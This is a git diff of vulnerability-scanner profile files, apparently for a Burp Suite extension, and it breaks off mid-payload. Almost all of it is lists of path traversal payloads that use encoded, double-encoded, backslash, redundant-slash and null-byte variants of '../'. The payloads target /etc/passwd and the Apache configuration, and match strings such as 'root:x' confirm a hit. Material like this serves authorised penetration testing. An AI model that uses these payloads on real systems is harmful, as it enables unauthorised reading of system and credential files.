+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
+ "true,../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
+ "true,..///{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
+ "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Apache server configuration"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-Apache2-conf",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/apache2/apache2.conf",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-Path-bypass.bb b/profiles/Linux-Path-bypass.bb
index a4f3687..e5b9543 100755
--- a/profiles/Linux-Path-bypass.bb
+++ b/profiles/Linux-Path-bypass.bb
@@ -1 +1,84 @@
-[{"Name":"Linux-Path-bypass","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["PathTraversal","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-path-bypass","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"},{"type":"Request","match":"([a-zA-Z0-9\\s_\\\\.\\-\\(\\):])+(.png|.jpg|.gif|.bmp|.jpeg|.PNG|.JPG|.GIF|.BMP|.JPEG)","replace":"{PAYLOAD}","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[34],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-Path-bypass",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,/../{FILE}",
+ "true,/../../{FILE}",
+ "true,/../../../{FILE}",
+ "true,/../../../../{FILE}",
+ "true,/../../../../../{FILE}",
+ "true,/../../../../../../{FILE}",
+ "true,/../../../../../../../{FILE}",
+ "true,/../../../../../../../../{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "PathTraversal",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-path-bypass",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/passwd",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "([a-zA-Z0-9\\s_\\\\.\\-\\(\\):])+(.png|.jpg|.gif|.bmp|.jpeg|.PNG|.JPG|.GIF|.BMP|.JPEG)",
+ "replace": "{PAYLOAD}",
+ "regex": "Regex"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 34
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-Path.bb b/profiles/Linux-Path.bb
index 95ce64c..0f746a4 100755
--- a/profiles/Linux-Path.bb
+++ b/profiles/Linux-Path.bb
@@ -1 +1,222 @@
-[{"Name":"Linux-Path","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":[".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}","./../{FILE}","./.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","../../{FILE}","../..//{FILE}","../..///{FILE}","../..//../{FILE}","../..//..///{FILE}","../..//../..//{FILE}","../..//../..///{FILE}","../..//../..//../{FILE}","../..//../..//..///{FILE}","../..//../..//../..//{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..//{FILE}","../..//../..//../..//../..///{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","../{FILE}%00.png","../../{FILE}%00.png","../../../{FILE}%00.png","../../../../{FILE}%00.png","../../../../../{FILE}%00.png","../../../../../../{FILE}%00.png","../../../../../../../{FILE}%00.png","../../../../../../../../{FILE}%00.png","....//{FILE}","....//....//{FILE}","....//....//....//{FILE}","....//....//....//....//{FILE}","....//....//....//....//....//{FILE}","....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//....//....//{FILE}","....%2F%2F{FILE}","....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%